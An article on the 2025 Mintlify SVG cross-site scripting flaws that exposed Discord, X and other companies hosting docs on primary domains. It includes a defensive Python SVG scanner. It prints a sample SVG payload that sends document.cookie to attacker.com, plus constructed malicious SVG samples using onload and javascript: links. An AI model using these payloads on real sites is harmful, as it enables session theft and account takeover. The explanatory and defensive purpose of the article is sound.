Discord shut down its entire developer documentation for two hours on November 7, 2025, after a 16-year-old security researcher discovered critical cross-site scripting (XSS) vulnerabilities in Mintlify, an AI-powered documentation platform used by hundreds of companies including X (Twitter), Vercel, and Cursor. The vulnerabilities, patched on November 15, 2025, allowed attackers to steal user credentials with a single malicious link by exploiting an unsecured endpoint that served SVG files containing embedded JavaScript across different customers’ domains.
How SVG Files Became the Attack Vector
Researcher Daniel discovered Mintlify’s /_mintlify/_static/[subdomain]/[...route] endpoint lacked origin validation, allowing him to fetch any customer’s static files. While HTML and JavaScript files were filtered, SVG files bypassed protections entirely. This is a common security pitfall: developers treat SVG files as “just images” when they’re actually XML-based documents that can contain executable <script> tags.
The proof-of-concept URL demonstrated the vulnerability: https://discord.com/_mintlify/_static/hackerone-a00f3c6c/lmao.svg. When opened directly in a browser, the SVG file executed JavaScript with full access to Discord’s cookies and session tokens. An attacker could embed a simple payload like this:
<svg xmlns="http://www.w3.org/2000/svg">
<script>
fetch('https://attacker.com/steal?cookies=' + document.cookie);
</script>
</svg>
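A defender-side check for exactly this file class, added here as an example and not Mintlify's or the researcher's code: it inspects an SVG body for the ways it can execute script (a script element, a foreignObject HTML island, on* event handlers, javascript: hrefs) and decides whether a static file may be served inline from the primary domain. The function names, the sandbox CSP choice and the sample SVGs are my own assumptions.

```python
import xml.etree.ElementTree as ET

def _local(name):
    # Strip the namespace prefix ElementTree adds, e.g. "{ns}script" -> "script".
    return name.rsplit("}", 1)[-1]

def svg_active_content(svg_text):
    """Return reasons this SVG can run code; an empty list means none were found."""
    try:
        root = ET.fromstring(svg_text)
    except ET.ParseError as exc:
        return [f"unparseable XML ({exc})"]  # fail closed: do not serve what we cannot inspect
    findings = []
    for el in root.iter():
        tag = _local(el.tag)
        if tag in ("script", "foreignObject"):  # a script, or an HTML island that can hold one
            findings.append(f"<{tag}> element")
        for attr, value in el.attrib.items():
            aname = _local(attr)
            if aname.lower().startswith("on"):  # onload=, onclick=, ... need no <script> at all
                findings.append(f"event handler {aname} on <{tag}>")
            if aname == "href" and value.strip().lower().startswith("javascript:"):
                findings.append(f"javascript: URL in href on <{tag}>")
    return findings

# Headers for an SVG that passed. The "sandbox" CSP is an assumed defense-in-depth choice:
# a directly opened SVG then has an opaque origin and cannot read the primary domain's cookies.
SAFE_SVG_HEADERS = {"Content-Type": "image/svg+xml",
                    "Content-Security-Policy": "sandbox",
                    "X-Content-Type-Options": "nosniff"}

def static_asset_decision(path, body):
    """Return (allowed, reason, headers). Filtering only .html/.js by extension, as the
    article describes, is what let the SVG through, so SVG bodies are inspected too."""
    ext = path.rsplit(".", 1)[-1].lower() if "." in path else ""
    if ext in ("html", "htm", "js"):
        return False, "active document type blocked by extension", {}
    if ext == "svg":
        findings = svg_active_content(body)
        if findings:
            return False, "; ".join(findings), {}
        return True, "svg without active content", dict(SAFE_SVG_HEADERS)
    return True, "passive asset", {"X-Content-Type-Options": "nosniff"}

# Constructed samples: a PoC-shaped file, one that uses no <script> element, and a clean icon.
POC_SVG = '<svg xmlns="http://www.w3.org/2000/svg"><script>alert(document.domain)</script></svg>'
NO_SCRIPT_SVG = ('<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"'
                 ' onload="alert(1)"><a xlink:href="javascript:alert(1)"><text>x</text></a></svg>')
CLEAN_SVG = '<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 8 8"><circle cx="4" cy="4" r="3"/></svg>'
```

A denylist like this is the minimum; rasterizing SVGs to PNG/JPG, as the takeaways below recommend, removes the problem class entirely.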
Similar SVG XSS vulnerabilities were discovered in Angular (CVE-2025-66412) and Plane (CVE-2025-21616) in 2025, proving this attack vector remains underestimated by developers and platforms alike.
Primary Domain Hosting Amplified the Damage
The real risk came from how companies hosted their documentation. Discord, X, Vercel, and Cursor all hosted Mintlify-powered docs on their primary domains (discord.com/developers, x.com/docs) rather than subdomains. This meant XSS vulnerabilities on documentation pages gained access to authentication cookies for the entire domain.
Browser same-origin policy treats all pages on company.com/* as having access to the same cookies. XSS on discord.com/developers/... can steal session tokens for discord.com itself. If Discord had hosted docs on docs.discord.com instead, the XSS would only access that subdomain’s cookies—not the main Discord session.
Discord’s response made the stakes clear: shut down all developer documentation for two hours, investigate the vulnerability, then permanently revert to their previous documentation platform. Primary domain hosting turned a documentation platform bug into an existential security risk.
One Vulnerability, Hundreds of Affected Companies
This incident exemplifies supply chain attacks: one vulnerability in Mintlify simultaneously exposed hundreds of companies to account takeover attacks. Four CVEs were assigned—CVE-2025-67842 (static asset injection), CVE-2025-67844 (GitHub metadata exposure), CVE-2025-67845 (path traversal), and CVE-2025-67846 (deployment infrastructure vulnerability)—all patched November 15, 2025.
As researcher Daniel noted, “compromising a single supply chain can lead to a multitude of problems.” The researchers collectively received $11,000 in bug bounties ($4,000 from Discord, ~$7,000 from Mintlify). That amount seems low for a vulnerability affecting hundreds of organizations—supply chain bugs are systematically undervalued by current bug bounty economics.
Trust Broken Despite 8-Day Patch
Mintlify’s response was industry-leading: vulnerabilities discovered November 7, all CVEs patched November 15 (8-day turnaround). Researchers coordinated with Mintlify and affected companies via Slack channels for rapid remediation. Yet Discord still permanently abandoned the platform.
This demonstrates that supply chain trust is a one-way door. Once broken, even perfect remediation can’t restore it. Companies should ask themselves: “What happens if our critical third-party platform is compromised tomorrow? Can we migrate quickly?” Discord’s ability to roll back saved them. Organizations without rollback plans face much uglier choices.
Part of Broader 2025 Developer Tool Security Crisis
The Mintlify vulnerability joins an accelerating trend of supply chain attacks targeting developer tooling. According to ReversingLabs’ 2025 Software Supply Chain Security Report, attacks doubled from 13 per month (early 2024-March 2025) to 26 per month (April-December 2025). Notable 2025 incidents include the Nx npm token theft (6,700+ repositories leaked) and the GlassWorm VS Code marketplace attack.
OWASP elevated “Software Supply Chain Failures” to #3 in the Top 10:2025 security risks, reflecting growing recognition that third-party dependencies and platforms represent critical attack surfaces. Documentation platforms now join npm packages, VS Code extensions, AI coding assistants, and CI/CD pipelines as targets. Developers trust these tools implicitly, making them attractive for attackers.
Key Takeaways
- Subdomain isolation is critical – Hosting documentation on docs.company.com instead of company.com/docs limits XSS impact to the subdomain only, preventing attackers from accessing primary domain session tokens
- SVG files are executable content, not images – Platforms must filter or convert SVG files to raster formats (PNG/JPG) to prevent embedded JavaScript execution; treating SVGs as “safe images” is a security mistake
- Supply chain trust doesn’t recover from breaches – Mintlify’s 8-day patch turnaround was industry-leading, yet Discord permanently abandoned the platform; once trust breaks, customers leave regardless of remediation speed
- Bug bounties undervalue supply chain vulnerabilities – $11,000 for a bug affecting hundreds of companies demonstrates current programs focus on single-company impact, missing the multiplicative effect of supply chain compromises
- Developer tool attacks are accelerating – Supply chain attacks doubled to 26/month in 2025, with documentation platforms joining npm, VS Code extensions, and AI coding tools as high-risk attack surfaces requiring continuous security monitoring